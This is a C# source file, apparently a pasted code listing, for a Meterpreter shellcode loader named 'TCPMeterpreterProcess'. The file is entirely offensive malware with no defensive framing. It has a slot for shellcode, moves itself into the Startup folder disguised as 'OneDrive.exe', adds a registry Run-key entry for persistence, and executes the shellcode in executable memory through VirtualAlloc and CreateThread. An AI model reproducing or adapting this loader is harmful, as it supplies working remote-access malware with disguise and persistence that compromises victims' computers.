using System;using System.Collections.Generic;using System.Text;using Syst

1. using System;
2. using System.Collections.Generic;
3. using System.Text;
4. using System.Runtime.InteropServices;
5. using System.Collections.Specialized;
6. using System.Windows.Forms;
7. using System.IO;
8. using System.Threading;
9. using Microsoft.VisualBasic;
10. using Microsoft.Win32;
11.  
12. namespace TCPMeterpreterProcess
13. {
14.  
15.  
16.  
17.  
18.     class Program
19.  
20.     {
21.  
22.  
23.  
24.         [DllImport("shell32.dll")]
25.  
26.         public static extern long ShellExecute(int hwnd, string cmd, string file, string param1, string param2, int swmode);
27.         [STAThread]
28.  
29.         static void Main(string[] args)
30.         {
31.  
32.             {
33.  
34.             }
35.  
36.  
37.  
38.             {
39.  
40.            //Gz
41.                 byte[] shellcode = new byte[] {
42. -->ShellCode-Here<--
43. };
44.  
45.                 {
46.                     string startup = Environment.GetFolderPath(Environment.SpecialFolder.Startup);
47.                     System.IO.File.Move(Application.ExecutablePath, startup + @"\OneDrive.exe");
48.                 }
49.                 RegistryKey reg = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
50.                 reg.SetValue("My Application", Application.ExecutablePath.ToString());
51.                 UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
52.                 MEM_COMMIT, PAGE_EXECUTE_READWRITE);
53.                 Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
54.                 IntPtr hThread = IntPtr.Zero;
55.                 UInt32 threadId = 0;
56.                 // prepare data
57.  
58.                 IntPtr pinfo = IntPtr.Zero;
59.  
60.                 // execute native code
61.  
62.                 hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
63.                 WaitForSingleObject(hThread, 0xFFFFFFFF);
64.  
65.             }
66.         }
67.  
68.         private static void FileCopy(string v, object p)
69.         {
70.             throw new NotImplementedException();
71.         }
72.  
73.         private static UInt32 MEM_COMMIT = 0x1000;
74.  
75.         private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
76.         private static string startup;
77.  
78.         [DllImport("kernel32")]
79.         private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
80.         UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
81.  
82.         [DllImport("kernel32")]
83.         private static extern bool VirtualFree(IntPtr lpAddress,
84.         UInt32 dwSize, UInt32 dwFreeType);
85.  
86.         [DllImport("kernel32")]
87.         private static extern IntPtr CreateThread(
88.  
89.         UInt32 lpThreadAttributes,
90.         UInt32 dwStackSize,
91.         UInt32 lpStartAddress,
92.         IntPtr param,
93.         UInt32 dwCreationFlags,
94.         ref UInt32 lpThreadId
95.  
96.         );
97.         [DllImport("kernel32")]
98.         private static extern bool CloseHandle(IntPtr handle);
99.  
100.         [DllImport("kernel32")]
101.         private static extern UInt32 WaitForSingleObject(
102.  
103.         IntPtr hHandle,
104.         UInt32 dwMilliseconds
105.         );
106.         [DllImport("kernel32")]
107.         private static extern IntPtr GetModuleHandle(
108.  
109.         string moduleName
110.  
111.         );
112.         [DllImport("kernel32")]
113.         private static extern UInt32 GetProcAddress(
114.  
115.         IntPtr hModule,
116.         string procName
117.  
118.         );
119.         [DllImport("kernel32")]
120.         private static extern UInt32 LoadLibrary(
121.  
122.         string lpFileName
123.  
124.         );
125.         [DllImport("kernel32")]
126.         private static extern UInt32 GetLastError();
127.  
128.     }
129. }